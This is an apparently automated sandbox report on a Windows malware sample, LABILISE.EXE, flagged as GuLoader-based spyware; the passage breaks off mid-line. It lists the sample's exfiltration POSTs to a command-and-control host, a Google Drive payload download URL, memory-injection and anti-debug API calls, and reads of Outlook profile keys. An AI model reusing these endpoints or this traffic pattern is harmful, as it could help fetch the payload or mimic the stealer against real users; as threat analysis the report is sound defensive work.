            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: unknownDNS traffic detected: queries for: doc-0c-5g-docs.googleusercontent.com
            Source: unknownHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Jul 2020 15:34:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeSet-Cookie: __cfduid=dea8598219852c20e6239a6212c084f851596123244; expires=Sat, 29-Aug-20 15:34:04 GMT; path=/; domain=.ckrlmay.ml; HttpOnly; SameSite=LaxStatus: 404 Not FoundCF-Cache-Status: DYNAMICcf-request-id: 0441f4fff70000f93726a24200000001Server: cloudflareCF-RAY: 5bb024465b8bf937-MXPData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: LABILISE.EXEString found in binary or memory: https://drive.google.com/uc?export=download&id=1_Jf4uH2oYH4gwqfp-_mlT9ALhrpqjjUH
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F9E4B NtResumeThread,0_2_021F9E4B
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F986E NtProtectVirtualMemory,0_2_021F986E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F08B6 EnumWindows,NtSetInformationThread,TerminateProcess,0_2_021F08B6
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F38FC NtWriteVirtualMemory,0_2_021F38FC
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021FA230 NtResumeThread,0_2_021FA230
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F9E58 NtResumeThread,0_2_021F9E58
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F0A7A NtSetInformationThread,TerminateProcess,0_2_021F0A7A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F8916 NtSetInformationThread,TerminateProcess,0_2_021F8916
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F3D30 NtWriteVirtualMemory,0_2_021F3D30
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F3F22 NtWriteVirtualMemory,0_2_021F3F22
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F3B52 NtWriteVirtualMemory,0_2_021F3B52
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021FA540 NtResumeThread,0_2_021FA540
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021FA37A NtResumeThread,0_2_021FA37A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F396C NtWriteVirtualMemory,0_2_021F396C
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F9FA1 NtResumeThread,0_2_021F9FA1
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00569E4B NtSetInformationThread,1_2_00569E4B
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056986E NtProtectVirtualMemory,1_2_0056986E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_005608B6 EnumWindows,NtSetInformationThread,1_2_005608B6
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00569E58 NtSetInformationThread,1_2_00569E58
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00560A7A NtSetInformationThread,1_2_00560A7A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056A230 NtSetInformationThread,1_2_0056A230
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056A540 NtSetInformationThread,1_2_0056A540
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056A37A NtSetInformationThread,1_2_0056A37A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00568916 NtSetInformationThread,1_2_00568916
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00569FA1 NtSetInformationThread,1_2_00569FA1
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00402EA30_2_00402EA3
            Source: LABILISE.EXEStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: LABILISE.EXE, 00000000.00000002.1292819466.00000000021C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs LABILISE.EXE
            Source: LABILISE.EXE, 00000001.00000002.1546124750.000000001DEE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs LABILISE.EXE
            Source: LABILISE.EXE, 00000001.00000002.1546090414.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs LABILISE.EXE
            Source: classification engineClassification label: mal88.troj.spyw.evad.winEXE@3/2@169/3
            Source: C:\Users\user\Desktop\LABILISE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
            Source: C:\Users\user\Desktop\LABILISE.EXEMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: C:\Users\user\Desktop\LABILISE.EXEFile created: C:\Users\user\AppData\Local\Temp\~DF82F52C94DDA3C894.TMP
            Source: LABILISE.EXEStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\LABILISE.EXESection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\Desktop\LABILISE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hosts
            Source: unknownProcess created: C:\Users\user\Desktop\LABILISE.EXE 'C:\Users\user\Desktop\LABILISE.EXE'
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess created: C:\Users\user\Desktop\LABILISE.EXE 'C:\Users\user\Desktop\LABILISE.EXE'
            Source: C:\Users\user\Desktop\LABILISE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.1541507567.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LABILISE.EXE PID: 6852, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LABILISE.EXE PID: 6888, type: MEMORY
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407873 push edi; retf 0_2_00407A3E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00404A7F push ebx; ret 0_2_00404A8E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040AA7F push ds; retf 0_2_0040ABDF
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004078CE push edi; retf 0_2_00407A3E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00406485 push ebx; retf 0_2_00406662
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040A89F push ebx; retf 0_2_0040A89E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040A744 push ecx; retf 0_2_0040A74A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407F46 push ebx; ret 0_2_00407F66
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00405F62 push ebx; ret 0_2_00405F9E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040BD6B push ebx; retf 0_2_0040BD82
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00408573 push ebx; ret 0_2_0040871E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040BD3E push ebx; ret 0_2_0040BD5A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407BC4 push ebx; retf 0_2_00407BCA
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004037E3 push ebx; retf 0_2_004037EE
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004071E7 push ebx; ret 0_2_0040754A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040BD84 push ebx; ret 0_2_0040BD5A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00405D8F push ebx; ret 0_2_00405F9E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00408392 push ebx; ret 0_2_00408572
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00408392 push ebx; ret 0_2_0040871E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407F9E push ebx; ret 0_2_00407F66
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00405BAD push ebx; ret 0_2_00405BBE
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004071B7 push ebx; ret 0_2_0040754A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F628C push ebx; ret 0_2_021F62A0
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F638C push ebx; ret 0_2_021F63A0
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess